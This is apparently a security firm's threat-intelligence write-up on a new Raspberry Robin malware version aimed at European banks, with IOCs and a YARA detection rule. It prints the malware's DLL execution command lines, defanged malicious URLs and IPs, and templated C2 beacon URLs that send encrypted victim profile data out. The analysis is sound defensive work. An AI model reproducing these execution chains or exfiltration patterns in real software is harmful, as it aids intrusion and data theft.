.png){kind=logo}
Recent attacks documented in previous months seem to be orchestrated by hacking groups using a framework called Raspberry Robin. This well-designed automated framework allows attackers post-infection capabilities to evade detection, move laterally and leverage trusted cloud infrastructures of known data hosting providers such as Discord, Azure & Github, among rest.
Threat researchers Felipe Duarte, Charles Lomboni & Shlomit Chkool, responded to similar incidents twice this month and in each case were able to dissect the downloader from its parent wrapper and unveil the malware which pointed to the aforementioned Raspberry Robin framework.
What is unique about the malware is that it is heavily obfuscated and highly complex to statically disassemble. Dynamically peeling back one layer at a time, the researchers were ultimately able to find the inner config of the malware and get the Indicators of Compromise (IOCs) contained within it. Reading recent articles from TrendMicro & Microsoft, the researchers were able to successfully attribute the attack to Raspberry Robin, as the IOCs overlapped with the Raspberry Robin infrastructure and Tactics, Techniques & Procedures (TTPs). In both attacks, the same IP address stood out - 85.56.236[.]45.
The IP address was spotted by @1ZRR4H, researcher at cybersecurity firm CronUp, who linked it to a Cybereason article. In his tweet he also mentions the use of a QNAP server, which is the technology behind the infamous IP address.
"The difference between what we saw in our investigation comparing to previously documented research is that Raspberry Robin operators suddenly began to collect much more data about their victims", said Threat Researcher, Charles Lomboni.
"Not only did we discover a version of the malware that is several times more complex, but we also found that the C2 beaconing, which used to have a URL with a plain-text username and hostname, now has a robust RC4 encrypted payload," added Senior Threat Researcher Felipe Duarte, who led the investigation along with the company's CEO & Founder, Ido Naor.
The article in nutshell:
(1) Raspberry Robin is targeting the financial sector in Europe.
(2) Victimology focuses on Spanish and Portuguese speaking organizations.
(3) Attackers have begun collecting more victim machine data.
(4) Downloader mechanism was updated with new anti-analysis capabilities.
(5) The same QNAP server is being used for several rounds of attacks, but victim data is no longer in plain-text. It is RC4 encrypted.1st Case
Shellcode activity was detected using custom rules added to the client's XDR solution, resulting in beacons being sent to a C2 server via a Tor connection.
The forensics investigation showed that a 7zip file downloaded from the victim's browser, potentially from a malicious link or attachment that tricked the user into taking action. Upon inspection, the archive was found to be an MSI installer that, when executed, drops several files onto the victim's machine.
The packed version of the MSI was spotted on Virus Total and had only 5 detections at the time. As can be seen from the screenshot, it is 482.74MB in size. However, when unpacked, the file is only 1.24MB in size and its detections are much more informative when the binary is tested against known protection engines.
While analyzing the suspected file, we identified the IP address 85.56.236[.]45, which used as a C2 server to download additional modules of the framework. Once the modules are installed, all traffic is routed through Tor. An example of the execution of two of those modules (zhddmeb.dll & gikfjit.dll) is shown below.
Process : C:\Windows\SysWOW64\regsvr32.exe Started with CMD : C:\WINDOWS\syswow64\regsvr32.exe zhddmeb.dll
Process : C:\Windows\SysWOW64\rundll32.exe Started with CMD : C:\WINDOWS\syswow64\rundll32.exe gikfjit.dll, ahdpThe process dump of rundll32.exe reveals the C2 server and the request used by the botnet to beacon back home. It shows a similar pattern to the one shared by Microsoft in its report, but not the exact same. In fact, this was the first indication that the threat actors have updated several internal modules of this infamous botnet.
2nd Case
In this case, we started our investigation with a suspicious ZIP file downloaded by the user from Microsoft Edge, probably through a malicious advertisement campaign hosted on eu[.]adbison-redirect[.]com. This domain has bad reputation and has been reported as an adware source, which increases suspicions that the Raspberry Robin attack framework is merely "riding" on top of the campaign.
Once the user interacts with the malicious advertisement, they are redirected to an intermediary server 135.148.169[.]133 that provides the final URL where the malicious code is hosted.
hxxps://eu.adbison-redirect[.]com/click?payload=eyJzZXNzaW9uX3V1aWQiOiI0MGZiZGE0NS02...The IP address is hidden in the Base64 payload.
{"session_uuid":"XXXXda45-XXXX-41ef-8112-820e2a85XXXX","worker_host":"135.148.169[.]133"...}This intermediate server also runs Prometheus, which allows the performance of the campaign to be monitored, as shown below:
To avoid detection and bypass security controls, the malicious payload is hosted on a Discord server:
hxxps://cdn.discordapp[.]com/attachments/.../File_Part.1.ZIPAlthough the domain is not malicious, it is actively being used by the threat actors to deliver malware onto the victim machine.
The malicious file, named File_Part.1.zip, contains encoded JScript code that, upon execution, drops a DLL in the Temp folder and executes it using known Raspberry Robin command-line characteristics:
C:\Windows\System32\rundll32.exe" shell32 ShellExec_RunDLL regsvr32 -s "C:\Users\user\AppData\Local\Temp\[RANDOM_NAME].New Downloader Anatomy
Several things have been improved in the latest version of the downloader, including the execution mechanism, code obfuscation and added encryption layer. It seems that developers were busy in this iteration adding protections to their code to avoid security tools and the curious eyes of malware analysts.
According to the new version, it is not longer necessary to use the blend of LNK files with CMD commands, as reported by several antivirus vendors in the past. This technique was used in the past to launch the Windows binary msiexec.exe to fetch additional content from internet. Now, we have a more complex malware protection mechanism implements at least five layers of protections before executing the actual malicious code, which is now compiled as a x86 shellcode available only in memory.
To make the analysis of this wrapper easier for the reader to understand, we have divided the infection flow into three different stages, which are presented in the following screenshot. All the details related to each stage are explained in the subsections below.
First Stage - Generic Packer
This layer of protection exists solely to obscure the code of the next stages of the attack. To accomplish this, once it is executed, it decrypts in its memory space a small shellcode and the Second Stage Loader DLL (see Figure 3) in its memory space.
The shellcode is then executed and used to resolve all imports required by the new DLL. Its final action will be to launch that DLL. It's worth mentioning that this shellcode implements a technique to pass execution to the DLL and deletes itself from memory.
This is done using the following instructions:
PUSH SC_BASE
PUSH DLL_ENTRYPOINT
JMP VirtualFreeSecond Stage - Intermediate Obfuscation
This component is complex, time-consuming and dependent upon the researcher's level of Reverse Engineering skills. However, the Security Joes incident response team, which includes seasoned researchers, successfully accomplished this task, and the next paragraph will share its conclusions.
The purpose of this artifact is simple - to hide the Shellcode Downloader as much as possible from the researcher and evade automated security controls. This is done by obfuscating the control-flow with a large amount of unused instructions (see Figure 4) and an additional shellcode (Intermediate Shellcode) which is decrypted and executed at run-time.
This last shellcode is the one that finally launches the main logic of the Shellcode Downloader.
Third Stage - Shellcode Downloader
As mentioned by Microsoft, C2 servers used by Raspberry Robin are usually compromised QNAP devices exposing the port 8080 and using a constant URL pattern in the request parameters.
In previous versions of this malware, the interaction between bots and attackers' infrastructure was mainly used for the sole purpose of downloading the corresponding payloads and complete the infection. It didn't seem to have any purpose for gathering information from infected machines. Operators limited the reconnaissance to merely username and hostname of the victim machine, sent in plain-text directly in the URL:
http://[C2_SERVER_IP]:8080/[RANDOMLY GENERATED PATH]/[HOSTNAME]?[USERNAME]This behavior had dramatically changed in the latest infections spotted in the wild by Security Joes. In those cases we investigated, threat actors decided to implement additional validations on their backend to have a better segmentation and visibility of their targets. This allows them to filter bots running in sandboxes, analyze environments and respond to any other circumstance that could interfere a segment of the botnet operation, to fix it in real-time. This also provides operators the possibility of deploying different payloads based on the system information of the machine and even deceiving security researchers as was previously reported by TrendMicro.
Enriching C2 Comms
To be more specific, the attackers behind Raspberry Robin decided to profile victims using the following parameters:
(1) [C2_SERVER_IP] - C2 server IP (From previous attacks)
(2) [HEADER] - 4 hardcoded bytes used to determine the start of the data
(3) [PEB_DATA] - Contents of the Process Environment Block (PEB).
(4) [UUID] - Unique identifier generated using the MAC address of the machine
(5) [MINUTES_ON] - Number of minutes that have elapsed since the system was started
(6) [HOSTNAME]*[USERNAME] - Hostname and username tuple (From previous attacks)
(7) [HEXLIFY_PROCESSOR_NAME] - Processor name
(8) [DISPLAY_DEVICE] - Information about the display devices in the machineAll this information is now encrypted using RC4 with a hardcoded key, which is appended to the URL using the ASCII representation of the hexadecimal values. This new structure, creates the following request pattern:
http://[C2_SERVER_IP]:8080/hexlify(rc4([HEADER]))hexlify(rc4([PEB_DATA]*[UUID]*[MINUTES_ON]*[HOSTNAME]*[USERNAME]*[HEXLIFY_PROCESSOR_NAME]*[DISPLAY_DEVICE]))Downloader Logic
The general logic of the downloader was also tweaked, adding additional validations and encryption-related code.
We can summarize this new logic as follows:
Verifies if the victim has been previously infected by this malware via the registry key SOFTWARE\Microsoft\Multimedia\Active.
Creates a profile of the victim's machines including some system-related information such as the hostname, username, processor name and additional data from the video devices available in the machine.
System profile is encrypted with RC4, using a hard-coded key, and it is sent to the C2 server.
C2 server provides the corresponding payload (a Windows executable) according to the victim's profile.
This new PE file is finally executed using the Windows API WinExec.
It is worth mentioning that the bot does not do a good job validating the content provided by the C2 server before executing it, it just checks the MZ header at the beginning of the file before launching it.
Conclusions
Security Joes incident response team has learned that hacking groups are using a new version of Raspberry Robin to attack financial institutes in Europe. We urge other security teams to update their defense mechanisms with the information in this article and contact us if they need any additional help.
Security Joes is a 24/7 follow-the-sun MDR & IR security firm with vast knowledge in forensics investigations and malware analysis. You are more than welcome to take a look at other articles in the blog, register to our YouTube channel, and follow us on Twitter.
IOCs
In this section, all the indicators of compromised collected during our investigation are shared freely. If you found a mistake, please contact us via the website chat or in email.
Value | Description |
hxxp://85.56.236[.]45:8080 | Compromised QNAP server hosting the C2 |
9c9426776b62a4461b7a9237a971fb3c5fc3222acd303506a763aa1d314a1573 | Malicious MSI installer |
b11805162d3ae3d3c6635c240d004d1fe942a9cde25fb701c92a8e135d37d100 | ZIP dropped by the malicious advertisement campaign |
ac7d57c011c1bf1b3158a64d4c91e1d5c54e8d05cdeb9d1fadcbb0c4d5103428 | Unpacked.bin |
21122891977d9296eea86a8a292b2ba7677766a2085566a6e93ecf60f0ac6ee5 | JScript Encoded Dropper |
hxxps://eu.adbison-redirect[.]com/click?payload=[JSON_BASE64] | Malicious advertisement redirector |
hxxps://cdn.discordapp[.]com/attachments/[random_numeric]/[random_numeric_2]/File_Part.1.ZIP | Abused discord-related domain |
FAFE11F23567080FB14CFD3B51CB440B9C097804569402D720FD32DD66059830 | Raspberry Robin |
Yara Rules
rule win_x86_downloader_raspberryrobin_shellcode {
meta:
author = "Charles Lomboni, Security Joes"
description = "Detects shellcode used by Raspberry Robin"
sha256 = "d0a880123eb8671bc04dcf5f79e086e6a0338fbcd40a84af8ac59a7d7a323601"
date = "01-01-2023"
strings:
$op1 = { 41 63 74 69 76 65 00 00 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 4d 75 6c 74 69 6d 65 64 69 61 00 00 00 25 30 38 78 2a 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 25 30 32 78 2a 25 75 00 00 00 00 43 4f 4d 50 55 54 45 52 4e 41 4d 45 00 00 00 00 }
$op2 = { 89 56 0c 8d 74 24 60 0f a2 89 06 8d 44 24 10 50 }
$op3 = { 46 69 6c 65 41 00 75 72 6c 6d 6f 6e 2e 64 6c 6c }
$op4 = { ce 05 57 69 6e 45 78 65 63 00 f7 05 5f 6c 6f 70 }
condition:
all of them
}